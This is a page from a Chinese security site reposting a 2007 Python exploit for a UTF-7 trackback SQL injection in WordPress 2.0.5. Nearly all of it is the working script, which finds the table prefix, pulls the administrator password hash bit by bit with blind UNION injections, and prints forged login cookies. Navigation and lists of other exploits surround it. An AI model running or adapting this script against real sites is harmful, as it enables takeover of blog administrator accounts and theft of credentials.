首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit
来源:vfocus.net 作者:Stefan 发布时间:2007-01-08  

#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#
# NOT FOR DISTRIBUTION
# PLEASE DO NOT SPREAD THIS CODE
#
#######################################################################
#
# -= Wordpress 2.0.5 =-
# Trackback UTF-7 SQL injection exploit
#
# beware of encoded single-quotes
#
#######################################################################

import urllib
import getopt
import sys
import string
import re
import time
import datetime
import md5

__argv__ = sys.argv

def banner():
print "Wordpress 2.0.5 - Trackback UTF-7 SQL injection exploit"
print "Copyright (C) 2006 Stefan Esser/Hardened-PHP Project"
print " *** DO NOT DISTRIBUTE ***\n"

def usage():
banner()
print "Usage:\n"
print " $ ./wordpressx.py [options]\n"
print " -h http_url url of the Wordpress blog"
print " f.e. http://www.wordpress.org/development/"
print " -p id id of posting to exploit trackback (default: 1)"
print " -i id User id to steal password hash for(default: -1)"
print " -u username username to steal password hash for (default: ...)"
print ""
sys.exit(-1)

def determineCookieHash(host):

wclient = urllib.URLopener()

print "[+] Connecting to retrieve cookie hash"

try:
req = wclient.open(host + "/wp-login.php?action=logout")
except IOError, e:
if e[1] == 302:
# Got a 302 redirect, but check for cookies before redirecting.
# e[3] is a httplib.HTTPMessage instance.
if e[3].dict.has_key('set-cookie'):
cookie = e[3].dict['set-cookie'];
chash = cookie[string.find(cookie, "user_")+5:]
chash = chash[:string.find(chash, "=")]
print "[+] Cookie hash found: %s" % chash
return chash


print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
return ""

def determineIsMbstringInstalled(host, pid):

wclient = urllib.URLopener()

print "[+] Connecting to check if mbstring is installed"

params = {
'charset' : 'UTF-7',
'title' : '+ADA-'
}

try:
req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
except IOError, e:
if e[1] == 302:
print "[+] ext/mbstring is installed. continue with exploit"
return 1

content = req.read()

if string.find(content, 'error>1</error>') != -1:
print "[-] Illegal posting id choosen, test impossible"
sys.exit(-2)

print "[-] ext/mbstring not installed... exploit not possible"
sys.exit(-2)
return 0

def determineTablePrefix(host, pid):

wclient = urllib.URLopener()

print "[+] Connecting to determine mysql table prefix"

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : '+ACc-ILLEGAL'
}

try:
req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
except IOError, e:
if e[1] == 302:
print "[-] Table prefix cannot be determined... exploit not possible"
sys.exit(-2)
return ""

content = req.read()

f = re.search('FROM (.*)comments WHERE', content)
if f != None:
prefix = f.group(1)
print "[+] Table prefix is: %s" % prefix
return prefix

print "[-] Table prefix cannot be determined... exploit not possible"
sys.exit(-2)
return ""

def lockTrackbacks(host, pid):

now = datetime.datetime.utcnow()
now = now.replace(microsecond = 0)

future = now + datetime.timedelta(days=1)
future = future.replace(microsecond = 0)

wclient = urllib.URLopener()

print "[+] Connecting to lock trackbacks"

author = "Mark Mouse"
author_email = "mark@incidents.org"
author_url = ""
author_ip = "210.35.2.3"
agent = "Internet Explorer"
futuredate = future.isoformat(' ')
futuredate_gmt = future.isoformat(' ')
date = now.isoformat(' ')
date_gmt = now.isoformat(' ')

sql = "%s','%s','%s','%s','%s','%s','','0','%s','comment','0','0'),('0', '', '', '', '', '%s', '%s', '', 'spam', '', 'comment', '0','0' ) /*" % \
( author , author_email , author_url , author_ip , date , date_gmt , agent, futuredate, futuredate_gmt )

sql = string.replace(sql, "'", "+ACc-")

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : sql
}

try:
req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
except IOError, e:
if e[1] == 302:
print "[-] Table prefix cannot be determined... exploit not possible"
sys.exit(-2)
return ""

content = req.read()

return ""

def checkUsername(host, pid, prefix, name, uid):

wclient = urllib.URLopener()

print "[+] Connecting to check if user %s is present" % name

if uid != -1:
sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE ID='%s' /*" % (prefix, uid)
else:
sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE user_login='%s' /*" % (prefix, name)

sql = string.replace(sql, "'", "+ACc-")

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : sql
}

req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))

content = req.read()


if string.find(content, 'Duplicate') != -1:
return 1
if string.find(content, 'Doppelter') != -1:
return 1

if uid != -1:
print "[-] Error user_id invalid"
else:
print "[-] Error username invalid"
sys.exit(-2)
return 0


def bruteforceBit(host, pid, prefix, name, uid, bit):

wclient = urllib.URLopener()

nibble = (bit / 4) + 1
bit = (bit % 4) + 1

sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE " % prefix

if uid != -1:
sql = sql + "ID='%s'" % uid
else:
sql = sql + "user_login='%s'" % name

sql = sql + " and substring(reverse(lpad(conv(substring(user_pass, %d,1), 16, 2),4,'0')),%d,1)='1' /*" % (nibble, bit)

sql = string.replace(sql, "'", "+ACc-")

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : sql
}

req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))

content = req.read()

if string.find(content, '15 seconds') != -1:
return 0
if string.find(content, '15 Sekunden') != -1:
return 0
if string.find(content, 'Duplicate') != -1:
return 1
if string.find(content, 'Doppelter') != -1:
return 1

print "[-] Error retrieving password hash: unexpected reply at bit %d" % bit
sys.exit(-2)
return ""

def bruteforce(host, pid, prefix, name, uid):

phash = ""

print "[+] Retrieving the password hash bit by bit"

for i in range(32):
nibble = 0
for j in range(4):
nibble = nibble | (bruteforceBit(host, pid, prefix, name, uid, i*4+j) << j)
phash = phash + "%x" % nibble

return phash

def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:i:u:p:e:d:")
except getopt.GetoptError:
usage()

if len(__argv__) < 2:
usage()

username = 'admin'
password = None
email = None
domain = None
host = None
pid = 1
uid = -1
for o, arg in opts:
if o == "-h":
host = arg
if o == "-p":
pid = arg
if o == "-i":
uid = arg
if o == "-u":
username = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg

# Printout banner
banner()

# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)

# if username == None:
# print "[-] username needed to continue"
# sys.exit(-1)
# if password == None:
# print "[-] password needed to continue"
# sys.exit(-1)
# if email == None:
# print "[-] email address needed to continue"
# sys.exit(-1)
# if domain == None:
# print "[-] catch all domain needed to continue"
# sys.exit(-1)

determineIsMbstringInstalled(host, pid)
chash = determineCookieHash(host)
lockTrackbacks(host, pid)

prefix = determineTablePrefix(host, pid)
checkUsername(host, pid, prefix, username, uid)

phash = bruteforce(host, pid, prefix, username, uid)

print "[+] Done..."
print " The password hash is %s" % phash

m = md5.new()
m.update(phash)
cphash = m.hexdigest()

print " The logincookies are:"
print " wordpressuser_%s=%s" % (chash, username)
print " wordpresspass_%s=%s" % (chash, cphash)

if __name__ == "__main__":
main()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NaviCOPA Web Server 2.01 (GET)
·AllMyLinks <= 0.5.0 (index.
·L2J Statistik Script <= 0.0
·OpenBSD 3.x - 4.0 vga_ioctl()
·Mac OS X 10.4.8 DiskManagement
·Berlios GPSD <= 2.7 Remote
·Mac OS X 10.4.8 DiskManagement
·Opera <= 9.10 JPG Image DHT
·CA BrightStor ARCserve (tapeen
·Application Enhancer (APE) 2.0
·iLife iPhoto Photocast (XML ti
·@lex Guestbook <= 4.0.2 Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved